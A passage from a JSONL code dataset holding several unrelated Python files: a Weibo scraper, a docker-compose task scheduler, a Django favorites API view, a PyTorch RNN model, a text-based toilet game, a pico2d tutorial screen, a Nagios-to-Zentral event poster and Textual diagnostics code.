daily_adjustment))\n\nwinsound.MessageBeep()\n","sub_path":"daily_fund_report.py","file_name":"daily_fund_report.py","file_ext":"py","file_size_in_byte":2586,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"271341845","text":"from pyspider.libs.base_handler import *\nimport codecs\nimport logging\nimport json\n\nclass Handler(BaseHandler):\n crawl_config = {\n }\n\n logging.basicConfig(level = logging.INFO)\n\n #client = KafkaClient(hosts = \"192.168.0.101:9092\",zookeeper_hosts=\"192.168.0.101:2181\")\n\n #生产kafka数据,通过字符串形式\n #def produce_kafka_data(kafka_topic,result):\n #with kafka_topic.get_producer(delivery_reports=True) as producer:\n #type(json.dump(result))\n #producer.produce(json.dump(result))\n\n def on_result(self, result):\n topic = self.client.topics[\"gakki\"]\n print(result)\n # self.produce_kafka_data(topic,result)\n #存入mongoDb\n\n #@every(minutes=24 * 60)\n def on_start(self):\n for x in range(1, 5):\n self.crawl('https://m.weibo.cn/api/container/getIndex?containerid=1076031882811994&page=%d' % x, callback=self.json_parser,validate_cert=False\n )\n\n def json_parser(self, response):\n return [{ \"card\": x\n } for x in response.json['data']['cards']]\n\n","sub_path":"GakkiSimle/WeiBoSpider_pyspider.py","file_name":"WeiBoSpider_pyspider.py","file_ext":"py","file_size_in_byte":1101,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"196228848","text":"import os\nimport time\nimport subprocess\nfrom threading import Lock, Thread\nimport logging\nfrom collections import namedtuple\n\nfrom watchdog.observers import Observer\nfrom watchdog.events import FileSystemEventHandler\nimport yaml\nimport delorean\n\nfrom config import TaskConfig, ConfigException\nfrom mailsender import MailSender\nimport logconfig\n\n\nlogger = logging.getLogger('docron')\n\n\nclass DirectoryWatch:\n \"\"\"Runs `callback` whenever something happens within `path`.\"\"\"\n\n def __init__(self, path, callback):\n class Handler(FileSystemEventHandler):\n def on_any_event(self, _):\n callback()\n\n self.observer = Observer()\n self.observer.schedule(Handler(), path, recursive=True)\n\n def start(self):\n self.observer.start()\n\n def stop(self):\n self.observer.stop()\n\n\nclass TaskParser:\n def __init__(self, path, config_filename):\n self.path = path\n self.config_filename = config_filename\n self._tasks = {}\n self.lock = Lock()\n self.dirwatch = 
DirectoryWatch(path, self.rescan)\n\n @property\n def tasks(self):\n with self.lock:\n ret = self._tasks\n return ret\n\n def start(self):\n self.dirwatch.start()\n self.rescan()\n\n def stop(self):\n self.dirwatch.stop()\n\n def scandir(self, fullpath, name):\n conf = os.path.join(fullpath, self.config_filename)\n dc = os.path.join(fullpath, 'docker-compose.yml')\n\n if not os.path.isfile(conf):\n return None\n if not os.path.isfile(dc):\n logger.warning('No docker-compose.yml in %s' % fullpath)\n return None\n\n with open(conf, 'r') as stream:\n try:\n config = yaml.load(stream)\n except yaml.YAMLError:\n logger.exception('yaml parse error: %s' % conf)\n return None\n\n try:\n tc = TaskConfig(config, fullpath, name)\n except ConfigException:\n return None\n return tc\n\n def rescan(self):\n with self.lock:\n self._tasks = {}\n for name in os.listdir(self.path):\n fullpath = os.path.join(self.path, name)\n if not os.path.isdir(fullpath):\n continue\n config = self.scandir(fullpath, name)\n if config:\n self._tasks[name] = (name, config)\n else:\n logger.warning('Invalid config for %s' % name)\n\n\nclass StreamReader(Thread):\n def __init__(self, stream, name):\n self.stream = stream\n self.lines = []\n self.lock = Lock()\n self.log = logging.getLogger(name)\n super(StreamReader, self).__init__()\n\n def getlist(self):\n with self.lock:\n return self.lines[:]\n\n def getstr(self):\n return ''.join(self.getlist())\n\n def run(self):\n for l in self.stream:\n self.log.info(l)\n with self.lock:\n self.lines.append(l)\n\n\nclass ProcessChecker(Thread):\n def __init__(self, task):\n self.task = task\n self.log = logging.getLogger('%s-checker' % task)\n super(ProcessChecker, self).__init__()\n\n def run(self):\n self.log.debug('Starting checker')\n while True:\n retcode = self.task.subprocess.poll()\n if retcode is not None:\n self.task.finished_at = self.task.now\n stdout = self.task.stdout.getlist()\n\n if retcode != 0:\n self.task.status = retcode\n self.task.failure()\n else:\n code = int(stdout[-1].split()[-1])\n self.task.status = code\n if code != 0:\n self.task.failure()\n else:\n self.task.success()\n\n del self.task.runner.runningtasks[self.task.name]\n break\n time.sleep(1)\n\n\nclass Task:\n CTask = namedtuple(\n 'CTask',\n 'name config status started_at finished_at trigger_period '\n 'stdout stderr')\n\n def __init__(self, name, config, runner):\n self.name = name\n self.config = config\n self.subprocess = None\n self.status = None\n self.started_at = None\n self.finished_at = None\n self.trigger_period = None\n self.stdout = None\n self.stderr = None\n self.runner = runner\n\n @property\n def context(self):\n return self.CTask(\n self.name, self.config,\n self.status if self.status is not None else '-',\n self.started_at or '-',\n self.finished_at or '-',\n self.trigger_period or '-',\n self.stdout.getstr() if self.stdout else '-',\n self.stderr.getstr() if self.stderr else '-')\n\n @property\n def now(self):\n n = delorean.utcnow()\n tz = self.trigger_period.timezone\n return DocronTime(n, fmt_tz=tz)\n\n def run(self):\n self.runner.runningtasks[self.name] = self\n logger.info('running %s' % self)\n sp = subprocess.Popen(\n ['docker-compose up --no-color'],\n cwd=self.config.fullpath,\n bufsize=1,\n universal_newlines=True,\n shell=True,\n stdout=subprocess.PIPE,\n stderr=subprocess.PIPE)\n self.subprocess = sp\n self.stdout = StreamReader(sp.stdout, self.name + '/stdout')\n self.stderr = StreamReader(sp.stderr, self.name + '/stderr')\n self.checker = ProcessChecker(self)\n 
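# One reader thread per pipe keeps stdout/stderr drained so the child\n        # process cannot block on a full pipe buffer; the checker thread polls\n        # for exit, then fires success()/failure() and deregisters the task.\n        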
self.stdout.start()\n self.stderr.start()\n self.checker.start()\n\n def stop(self):\n subprocess.run(\n ['docker-compose stop'],\n cwd=self.config.fullpath,\n shell=True,\n stdout=subprocess.PIPE,\n stderr=subprocess.PIPE)\n\n def checkrun(self):\n self.started_at = self.now\n if self.name in self.runner.runningtasks:\n running_task = self.runner.runningtasks[self.name]\n self.skipped(running_task)\n else:\n self.run()\n\n def __str__(self):\n return self.name\n\n def mail(self, typ, **kwargs):\n mailconfig = getattr(self.config.mail, typ)\n if mailconfig.to:\n try:\n body = mailconfig.template.render(task=self.context, **kwargs)\n except Exception:\n msg = 'Exception during rendering %s e-mail for %s'\n msg = msg % (typ, self)\n logger.exception(msg)\n else:\n self.runner.mailsender.push(mailconfig, body)\n\n def success(self):\n logger.info('success: %s' % self)\n self.mail('success')\n\n def skipped(self, running_task):\n logger.warning('skipping: %s' % self)\n self.mail('skipped', running_task=running_task.context)\n\n def failure(self):\n logger.warning('failure: %s' % self)\n self.mail('failure')\n\n\nclass DocronTime:\n def __init__(self, delorean_object,\n fmt='%Y-%m-%d %H:%M:%S %Z(%z)', fmt_tz=None):\n self.delorean_object = delorean_object\n self.fmt = fmt\n self.fmt_tz = fmt_tz\n\n def format(self, fmt=None, timezone=None):\n fmt = fmt or self.fmt\n timezone = timezone or self.fmt_tz\n\n d = self.delorean_object\n if timezone is not None:\n d = d.shift(timezone)\n return d.datetime.strftime(fmt)\n\n def __str__(self):\n return self.format()\n\n\nclass TaskRunner:\n def __init__(self):\n self.taskparser = TaskParser('tasks', '.config.yml')\n self.mailsender = MailSender()\n self.runningtasks = {}\n self.first_check = True\n\n def start(self):\n logger.info('Starting Docron')\n self.taskparser.start()\n self.mailsender.start()\n try:\n self.runforever()\n except KeyboardInterrupt:\n pass\n finally:\n self.stop()\n\n def runforever(self):\n last_checked_time = int(time.time())\n while True:\n now = int(time.time())\n for sec in range(last_checked_time + 1, now + 1):\n self.check_for_second(sec)\n self.first_check = False\n last_checked_time = now\n time.sleep(1)\n\n def check(self, period, sec):\n d = delorean.epoch(sec).shift(period.timezone)\n dt = d.datetime\n dow = dt.isocalendar()[2]\n if dt.year not in period.year:\n return False\n if dt.month not in period.month:\n return False\n if dt.day not in period.day_of_month:\n return False\n if dt.hour not in period.hours:\n return False\n if dt.minute not in period.minutes:\n return False\n if dt.second not in period.seconds:\n return False\n if dow not in period.day_of_week:\n return False\n return True\n\n def check_for_second(self, sec):\n tasks = self.taskparser.tasks\n for name, config in tasks.values():\n task = Task(name, config, self)\n torun = False\n if self.first_check and task.config.schedule.runonstart:\n torun = True\n for p in task.config.schedule.periods:\n if torun:\n break\n if self.check(p, sec):\n torun = True\n task.trigger_period = p\n if torun:\n task.checkrun()\n\n def stop(self):\n logger.info('Stopping Docron')\n self.taskparser.stop()\n self.mailsender.stop()\n for t in self.runningtasks.values():\n t.stop()\n\n\ndef start():\n logconfig.configure_logging()\n runner = TaskRunner()\n runner.start()\n\n\nif __name__ == '__main__':\n 
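# start() configures logging and blocks in runforever() until Ctrl-C;\n    # stop() then tears down the watcher, mail sender, and running tasks.\n    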
start()\n","sub_path":"src/docron.py","file_name":"docron.py","file_ext":"py","file_size_in_byte":9893,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"273280067","text":"\"\"\" Copyright 2014 UW Information Technology, University of Washington\n\n    Licensed under the Apache License, Version 2.0 (the \"License\");\n    you may not use this file except in compliance with the License.\n    You may obtain a copy of the License at\n\n        http://www.apache.org/licenses/LICENSE-2.0\n\n    Unless required by applicable law or agreed to in writing, software\n    distributed under the License is distributed on an \"AS IS\" BASIS,\n    WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n    See the License for the specific language governing permissions and\n    limitations under the License.\n\n\"\"\"\n\nfrom spotseeker_server.views.rest_dispatch import RESTDispatch, JSONResponse\nfrom spotseeker_server.require_auth import user_auth_required\nfrom spotseeker_server.models import Spot, FavoriteSpot\nimport logging\n\nlogger = logging.getLogger(__name__)\n\n\nclass FavoritesView(RESTDispatch):\n    \"\"\" Performs actions on the user's favorites, at /api/v1/user/me/favorites.\n    GET returns 200 with a list of spots.\n    \"\"\"\n    @user_auth_required\n    def GET(self, request, spot_id=None):\n        if spot_id is None:\n            return self._get_all_favorites(request)\n        else:\n            return self._get_is_favorite(request, spot_id)\n\n    @user_auth_required\n    def PUT(self, request, spot_id):\n        user = self._get_user(request)\n        spot = Spot.objects.get(pk=spot_id)\n\n        log_message = (\"user: %s; spot_id: %s; favorite added\" %\n                       (user.username, spot.pk))\n        logger.info(log_message)\n        fav, created = FavoriteSpot.objects.get_or_create(user=user, spot=spot)\n        return JSONResponse(True)\n\n    @user_auth_required\n    def DELETE(self, request, spot_id):\n        user = self._get_user(request)\n        spot = Spot.objects.get(pk=spot_id)\n\n        # QuerySet.delete() removes every matching favorite in one query.\n        fav = FavoriteSpot.objects.filter(user=user, spot=spot)\n        fav.delete()\n\n        log_message = (\"user: %s; spot_id: %s; favorite removed\" %\n                       (user.username, spot.pk))\n        logger.info(log_message)\n        return JSONResponse(\"\")\n\n    def _get_all_favorites(self, request):\n        user = self._get_user(request)\n        favorites = []\n\n        objects = FavoriteSpot.objects.filter(user=user)\n\n        for fav in objects:\n            if hasattr(fav, 'spot'):\n                json = fav.spot.json_data_structure()\n                favorites.append(json)\n\n        return JSONResponse(favorites)\n\n    def _get_is_favorite(self, request, spot_id):\n        user = self._get_user(request)\n        spot = Spot.objects.get(pk=spot_id)\n\n        fav = FavoriteSpot.objects.filter(user=user, spot=spot)\n        if fav:\n            return JSONResponse(True)\n        return JSONResponse(False)\n","sub_path":"spotseeker_server/views/favorites.py","file_name":"favorites.py","file_ext":"py","file_size_in_byte":2807,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"520571279","text":"import torch.nn as nn\nfrom torch.autograd import Variable\nfrom torch import from_numpy as to_tensor\n\nfrom ran import RAN\n\nclass RNNModel(nn.Module):\n    \"\"\"\n    Container module with an embedding layer, a recurrent layer, and an\n    output layer.\n    \"\"\"\n\n    def __init__(self,\n                 rnn_type,\n                 vocab_size,\n                 embed_dims,\n                 n_units,\n                 n_layers,\n                 embeddings=None,\n                 bidirectional=False,\n                 dropout=0.2,\n                 tie_weights=False):\n        super(RNNModel, self).__init__()\n\n        # optionally add dropout regularisation\n        self.dropout = 
nn.Dropout(dropout)\n\n # the embedding matrix of size |V| x d\n self.embed = nn.Embedding(vocab_size, embed_dims)\n if embeddings is not None:\n self.embed.weight = nn.Parameter(to_tensor(embeddings))\n\n self.bidir = bidirectional\n\n # select the correct architecture\n\n if rnn_type in ['LSTM', 'GRU']:\n self.rnn_type = rnn_type\n self.rnn = getattr(nn, rnn_type)(embed_dims,\n n_units,\n n_layers,\n dropout=dropout,\n bidirectional=self.bidir)\n elif rnn_type == 'RAN':\n self.rnn = RAN(embed_dims, n_units, n_layers, dropout=dropout)\n else:\n try:\n model_info = rnn_type.split(\"_\")\n self.rnn_type = model_info[0]\n nonlinearity = model_info[1].lower()\n except KeyError:\n raise ValueError(\"An invalid option for `--model` was supplied.\\\n Options are ['LSTM', 'GRU', 'RNN_TANH', or\\\n 'RNN_RELU']\")\n self.rnn = nn.RNN(embed_dims,\n n_units,\n n_layers,\n nonlinearity=nonlinearity,\n dropout=dropout,\n bidirectional=self.bidir)\n\n # bidirectional needs 2x units\n n = int(self.bidir) + 1\n # output is linear as softmax is applied within the loss function\n self.output = nn.Linear(n * n_units, vocab_size)\n\n # Optionally tie weights as in:\n # \"Using the Output Embedding to Improve Language Models\" (Press & Wolf,\n # 2016) https://arxiv.org/abs/1608.05859\n # and\n # \"Tying Word Vectors and Word Classifiers: A Loss Framework for\n # Language Modeling\" (Inan et al. 2016) https://arxiv.org/abs/1611.01462\n if tie_weights:\n if n_units != embed_dims:\n raise ValueError('When using the tied flag, n_units must be\\\n equal to embdims')\n self.output.weight = self.embed.weight\n\n self.init_weights()\n\n self.rnn_type = rnn_type\n self.n_units = n_units\n self.n_layers = n_layers\n\n\n def init_weights(self):\n nn.init.xavier_uniform(self.embed.weight)\n self.output.bias.data.fill_(0)\n nn.init.xavier_uniform(self.output.weight)\n\n # This was the original RNN initialisation:\n # initrange = 0.1\n # self.embed.weight.data.uniform_(-initrange, initrange)\n # self.output.bias.data.fill_(0)\n # self.output.weight.data.uniform_(-initrange, initrange)\n\n\n def forward(self, input, hidden):\n # Apply dropout to embedding layer as in \"A Theoretically Grounded\n # Application of Dropout in Recurrent Neural Networks\" (Gal &\n # Ghahramani, 2016) https://arxiv.org/pdf/1512.05287.pdf\n embed = self.dropout(self.embed(input))\n rnn_output, hidden = self.rnn(embed, hidden)\n rnn_output = self.dropout(rnn_output)\n output = self.output(rnn_output.view(\n rnn_output.size(0) * rnn_output.size(1),\n rnn_output.size(2)))\n\n return output.view(rnn_output.size(0),\n rnn_output.size(1),\n output.size(1)\n ), hidden\n\n\n def init_hidden(self, batch_size):\n weight = next(self.parameters()).data\n n = int(self.bidir) + 1 # bidirectional needs 2x units\n\n if self.rnn_type == 'LSTM':\n return (Variable(weight.new(\n n * self.n_layers, batch_size, self.n_units).zero_()),\n (Variable(weight.new(\n n * self.n_layers, batch_size, self.n_units).zero_())))\n else:\n return Variable(weight.new(\n n * self.n_layers, batch_size, self.n_units).zero_())\n","sub_path":"recurrent/rnn.py","file_name":"rnn.py","file_ext":"py","file_size_in_byte":4806,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"501353929","text":"\"\"\"\nThis module stores classes for media objects, like Movie, Video, Show\n\"\"\"\n\nclass Movie(object):\n \"\"\"\n A class for a basic high-level abstraction on a movie and key web links\n \"\"\"\n\n def __init__(self,\n title,\n description,\n 
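# The two URL parameters below are assumed to be absolute links (poster\n                 # image and YouTube trailer); no validation is performed here.\n                 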
poster_image_url,\n trailer_youtube_url):\n \"\"\"\n Initializes and instance of the Movie() class\n :param self: \n :param title: \n :param description: \n :param poster_image_url: \n :param trailer_youtube_url: \n \"\"\" \n self.title = title\n self.description = description\n self.poster_image_url = poster_image_url\n self.trailer_youtube_url = trailer_youtube_url\n\n def getmoviesummaries(self, movie):\n \"\"\"\n Returns the a title and Description of the movie\n \"\"\"\n return str.format(\n \"Title: {0} - Description: {1}\",\n movie.title,\n movie.description)\n","sub_path":"media.py","file_name":"media.py","file_ext":"py","file_size_in_byte":1010,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"188602824","text":"import random\r\nprint(\"Hello! Welcome to my toilet simulator!\")\r\nprint(\"Press enter to continue\")\r\nh = input(\">\").lower()\r\nno = False\r\nnoob = False\r\nyes = False\r\nif h == (\"no\"):\r\n print(\"You bumbling bafoon, you are an absolute idiot and a stupid member of the land\")\r\n no = True\r\nif h == (\"obama\"):\r\n print(\"Do you think you're funny? Do that again and you will lose you nae nae privleges\")\r\n noob = True\r\nif h == (\"yes\"):\r\n print(\"no\")\r\n yes = True\r\nelse:\r\n yes = True\r\ntoiletmenu = True\r\nflushes = 0\r\nhp = 10\r\npaper = 0\r\nhpaper = 0\r\ncons = 0\r\nhouses = 1\r\ntoilets = 0\r\ncontoilets = 1\r\nfgain = 0\r\nwhile True:\r\n while toiletmenu == True:\r\n print(\"---------------------------------------------------------------------------------------------------------------------------\")\r\n print(\"TOILET ONLINE\")\r\n print(\"enter 'f' for flush, 't' for toilet paper, 'p' to view property, and 's' for shop!\")\r\n tmenu = input(\"> \").lower()\r\n if tmenu == (\"f\"):\r\n if noob == False:\r\n print(\"Toilet flushed successfully, you earned 1 flushcoin plus 1 for each piece of paper you flushed, per connected toilet flushed!\")\r\n fgain = (hpaper + 1) * contoilets\r\n flushes = flushes + fgain\r\n fgain = 0\r\n hpaper = 0\r\n print(\"You now have \", flushes, \" flushcoins\")\r\n else:\r\n print(\"In your attempt to flush the toilet you punch yourself in the face. -1 HP\")\r\n hp = hp -1\r\n print (\"you now have \", hp, \" hp left\")\r\n if hp < 1:\r\n print (\"You have died and become a ghost. On the plus side you learned to flush a toilet, practice makes perfect\")\r\n if tmenu == (\"t\"):\r\n if yes == False:\r\n if paper < 1:\r\n print(\"Your toilet paper holder is empty\")\r\n print(\"You are currently holding\", hpaper, \"pieces of toilet paper\")\r\n else:\r\n print(\"You took all of your toilet paper!\")\r\n hpaper = hpaper + paper\r\n print(\"You are holding\", hpaper, \"pieces of toilet paper\")\r\n paper = 0\r\n else:\r\n print(\"You reach for the toilet paper, however, you have placed it on the holder the wrong way around. Society abandons you.\")\r\n yes = False\r\n no = True\r\n if tmenu == (\"s\"):\r\n if no == True:\r\n print(\"On your way to the local shop you are spotted by police who arrest you and take you to a mental facility. The mental facility is titled toilet simulator. 
You walk to the shops\")\r\n                no = False\r\n            print(\"Welcome to the shops, here you can buy stuff with flushcoins you have collected\")\r\n            print(\"Press 'x' to purchase and open a standard toilet box\")\r\n            print(\"Press 'y' to purchase and open a deluxe toilet box\")\r\n            print(\"More toilet boxes and toilet season pass coming soon\")\r\n            print(\"If you want to go back press enter.\")\r\n            smenu = input(\">\").lower()\r\n            if smenu == (\"x\"):\r\n                if flushes > 4:\r\n                    lootrnd = (random.randint(60, 100) // 20) + (random.randint(20, 40) % random.randint(2, 10))\r\n                    lootrnd = int(lootrnd)\r\n                    lootrnd = lootrnd * 2\r\n                    flushes = flushes - 5\r\n                    if lootrnd == 55:\r\n                        print(\"JACKPOT!!!!\")\r\n                        print(\"You have received 5 houses, 5 toilets and 5 flush connectors\")\r\n                        toilets = toilets + 5\r\n                        houses = houses + 5\r\n                        cons = cons + 5\r\n                    else:\r\n                        paper = paper + lootrnd\r\n                        print(\"You gained \", lootrnd, \" pieces of toilet paper, you now have \", paper, \" pieces of toilet paper\")\r\n                else:\r\n                    print(\"You need\", (5 - flushes), \"more flushcoins to purchase a standard toilet box\")\r\n            elif smenu == (\"y\"):\r\n                if flushes > 19:\r\n                    flushes = flushes - 20\r\n                    lootrnd = random.randint(1, 10)\r\n                    if lootrnd <= 4:\r\n                        print(\"You gained\", lootrnd, \"toilets\")\r\n                        toilets = toilets + lootrnd\r\n                    elif lootrnd == 5 or lootrnd == 6 or lootrnd == 7 or lootrnd == 8:\r\n                        print(\"You gained 1 toilet connector\")\r\n                        cons = cons + 1\r\n                    elif lootrnd == 9:\r\n                        print(\"You gained 1 house\")\r\n                        houses = houses + 1\r\n                    else:\r\n                        print(\"Better luck next time!\")\r\n                else:\r\n                    print(\"You need \", (20 - flushes), \" more flushcoins to purchase a deluxe toilet box\")\r\n        if tmenu == (\"p\"):\r\n            print(\"You currently have \", houses, \" houses\")\r\n            print(\"You currently have \", toilets, \" unconnected toilets\")\r\n            print(\"You currently have \", cons, \" connectors\")\r\n            print(\"You currently have \", contoilets, \" connected toilets\")\r\n            print(\"Press 'a' to connect a toilet, remember there is a maximum of 5 toilets connected per house owned\")\r\n            print(\"Otherwise, press enter to cancel\")\r\n            a = input(\">\").lower()\r\n            if a == \"a\":\r\n                if toilets > 0:\r\n                    if cons > 0:\r\n                        if (contoilets // houses) < 5:\r\n                            toilets = toilets - 1\r\n                            cons = cons - 1\r\n                            contoilets = contoilets + 1\r\n                            print(\"Successfully connected toilet, you now have \", contoilets, \" connected toilets\")\r\n                        else:\r\n                            print(\"All of your houses are full\")\r\n                    else:\r\n                        print(\"You don't have enough toilet connectors\")\r\n                else:\r\n                    print(\"You don't have enough toilets\")\r\n","sub_path":"toilet simulator.py","file_name":"toilet simulator.py","file_ext":"py","file_size_in_byte":6213,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"148659308","text":"from pico2d import *\r\n\r\nclass Tutorial:\r\n    MOVE_TUTORIAL, BULLET_TUTORIAL, BUMP_TUTORIAL = 0, 1, 2\r\n\r\n\r\n    def bullet_tutorial(self):\r\n        if self.state == self.BULLET_TUTORIAL:\r\n            return True\r\n        else:\r\n            return False\r\n\r\n    def next_tutorial(self):\r\n        if self.state == self.MOVE_TUTORIAL:\r\n            self.state = self.BULLET_TUTORIAL\r\n\r\n    def big_next(self):\r\n        self.next_frame_x = 220\r\n        self.next_frame_y = 120\r\n\r\n    def small_next(self):\r\n        self.next_frame_x = 200\r\n        self.next_frame_y = 100\r\n\r\n    def handle_event(self, event):\r\n        x, y = event.x, 1000 - event.y\r\n\r\n        if x >= 800: return False\r\n        if x <= 600: return False\r\n        if y >= 930: return False\r\n        if y <= 870: return False\r\n\r\n        return True\r\n\r\n\r\n    
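# Sprites are loaded once per Tutorial instance; the '_bullet'/'_next' file\r\n    # names start with an underscore so the backslash paths below don't turn\r\n    # '\\b'/'\\n' into string escape sequences.\r\n    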
def __init__(self):\r\n self.state = self.MOVE_TUTORIAL\r\n\r\n self.next_frame_x, self.next_frame_y = 200, 100\r\n\r\n self.esc_image = load_image('png_file\\esc_tutorial.png')\r\n self.move_image = load_image('png_file\\move_tutorial.png')\r\n self.move_sub_image = load_image('png_file\\move_tutorial_sub.png')\r\n self.bullet_sub_image = load_image('png_file\\_bullet_tutorial_sub.png')\r\n\r\n self.next_image = load_image('png_file\\_next_tutorial.png')\r\n\r\n\r\n def update(self, frame_time):\r\n pass\r\n\r\n\r\n def draw(self):\r\n self.next_image.clip_draw(0, 0, self.next_frame_x, self.next_frame_y, 700, 900)\r\n\r\n self.esc_image.draw(150, 950)\r\n if self.state == self.MOVE_TUTORIAL:\r\n self.move_image.draw(400, 200)\r\n self.move_sub_image.draw(400, 600)\r\n\r\n elif self.state == self.BULLET_TUTORIAL:\r\n self.bullet_sub_image.draw(400, 600)","sub_path":"2D_GAME_7/tutorial.py","file_name":"tutorial.py","file_ext":"py","file_size_in_byte":1746,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"463420217","text":"#!/usr/bin/python\nimport argparse\nimport json\nimport ssl\nimport urllib2\n\nURL = \"%TLS_HOSTNAME%/nagios/post_event/\"\nUSER_AGENT = \"Zentral/neh 0.1\"\nHEADER = \"Zentral-API-Secret\"\nSECRET = \"%SECRET%\"\nZENTRAL_FULLCHAIN = u\"\"\"\n%FULLCHAIN%\n\"\"\"\n\n\nARGS = {\n \"host\": (\n (\"state\", \"$HOSTSTATE$\", str),\n (\"state_type\", \"$HOSTSTATETYPE$\", str),\n (\"attempt\", \"$HOSTATTEMPT$\", int),\n (\"name\", \"$HOSTNAME$\", str),\n (\"display_name\", \"$HOSTDISPLAYNAME$\", str),\n (\"address\", \"$HOSTADDRESS$\", str),\n (\"check_output\", \"$LONGHOSTOUTPUT$\", str),\n ),\n \"service\": (\n (\"state\", \"$SERVICESTATE$\", str),\n (\"state_type\", \"$SERVICESTATETYPE$\", str),\n (\"attempt\", \"$SERVICEATTEMPT$\", int),\n (\"description\", \"$SERVICEDESC$\", str),\n (\"check_output\", \"$LONGSERVICEOUTPUT$\", str),\n ),\n}\n\n\ndef build_payload(args):\n event_type = args.event_type\n payload_d = {\"event_type\": \"nagios_{}_event\".format(event_type)}\n for attr, _, _ in ARGS[event_type]:\n v = getattr(args, attr, None)\n if v:\n payload_d[attr] = v[0]\n return json.dumps(payload_d)\n\n\ndef post_event(args):\n req = urllib2.Request(URL)\n req.add_header('Content-Type', 'application/json')\n req.add_header('User-Agent', USER_AGENT)\n req.add_header(HEADER, SECRET)\n ctx = ssl.create_default_context(cadata=ZENTRAL_FULLCHAIN.strip() or None)\n data = build_payload(args)\n response = urllib2.urlopen(req, data=data, context=ctx)\n return json.load(response)\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(description='Post nagios event to Zentral.')\n subparsers = parser.add_subparsers(title=\"event types\",\n description=\"valid event types\",\n dest=\"event_type\")\n for event_type, event_type_args in ARGS.items():\n subparser = subparsers.add_parser(event_type, help=\"Post nagios {} event to Zentral.\".format(event_type))\n for attr, nagios_macro, attr_type in event_type_args:\n subparser.add_argument(attr, type=attr_type, nargs=1, help=nagios_macro)\n args = parser.parse_args()\n post_event(args)\n","sub_path":"zentral/contrib/nagios/event_handlers/zentral_event_handlers_py27.py","file_name":"zentral_event_handlers_py27.py","file_ext":"py","file_size_in_byte":2195,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"275302516","text":"import 
random,logging\nlogging.basicConfig(filename='log.txt',level=logging.DEBUG,format='%(asctime)s-%(levelname)s-%(message)s')\nguess=''\ndic={0:'tails',1:'heads'}\nlogging.debug('Start of program')\n#while guess not in ('heads','tails'):\nprint('Guess the coin toss!Enter heads or tails')\nlogging.debug('Value of guess is '+guess)\nguess=input()\ntoss=random.randint(0,1) #0 is tails\nlogging.debug('Value of toss is %s and guess is %s'% (toss,guess))\nif dic[toss] == guess:\n\tprint('You got it')\nelse:\n\tprint('Nope!Guess again')\n\tguess=input()\n\tlogging.debug('Value of next guess is '+guess)\nif dic[toss]==guess:\n\tprint('You got it!')\nelse:\n\tprint('Nope.You are really bad at this game')\nlogging.debug('End of program')\n","sub_path":"chap10/cointoss.py","file_name":"cointoss.py","file_ext":"py","file_size_in_byte":716,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"500506912","text":"\"\"\"Textual CLI command code to print diagnostic information.\"\"\"\n\nfrom __future__ import annotations\n\nimport os\nimport platform\nimport sys\nfrom functools import singledispatch\nfrom typing import Any\n\nfrom importlib_metadata import version\nfrom rich.console import Console, ConsoleDimensions\n\n\ndef _section(title: str, values: dict[str, str]) -> None:\n \"\"\"Print a collection of named values within a titled section.\n\n Args:\n title: The title for the section.\n values: The values to print out.\n \"\"\"\n max_name = max(map(len, values.keys()))\n max_value = max(map(len, values.values()))\n print(f\"## {title}\")\n print()\n print(f\"| {'Name':{max_name}} | {'Value':{max_value}} |\")\n print(f\"|-{'-' * max_name}-|-{'-'*max_value}-|\")\n for name, value in values.items():\n print(f\"| {name:{max_name}} | {value:{max_value}} |\")\n print()\n\n\ndef _versions() -> None:\n \"\"\"Print useful version numbers.\"\"\"\n _section(\"Versions\", {\"Textual\": version(\"textual\"), \"Rich\": version(\"rich\")})\n\n\ndef _python() -> None:\n \"\"\"Print information about Python.\"\"\"\n _section(\n \"Python\",\n {\n \"Version\": platform.python_version(),\n \"Implementation\": platform.python_implementation(),\n \"Compiler\": platform.python_compiler(),\n \"Executable\": sys.executable,\n },\n )\n\n\ndef _os() -> None:\n _section(\n \"Operating System\",\n {\n \"System\": platform.system(),\n \"Release\": platform.release(),\n \"Version\": platform.version(),\n },\n )\n\n\ndef _guess_term() -> str:\n \"\"\"Try and guess which terminal is being used.\n\n Returns:\n The best guess at the name of the terminal.\n \"\"\"\n\n # First obvious place to look is in $TERM_PROGRAM.\n term_program = os.environ.get(\"TERM_PROGRAM\")\n\n if term_program is None:\n # Seems we couldn't get it that way. 
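        # (Editor's note, summarizing the probe order implemented below:
        #  1. $TERM_PROGRAM, when the terminal sets it, e.g. iTerm2,
        #     Apple Terminal, VS Code;
        #  2. otherwise vendor-specific signatures: ALACRITTY_WINDOW_ID,
        #     KITTY_PID, WT_SESSION for Windows Terminal, INSIDE_EMACS,
        #     JEDITERM_SOURCE_ARGS for PyCharm;
        #  3. if $TERM_PROGRAM was found, $TERM_PROGRAM_VERSION is appended.)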
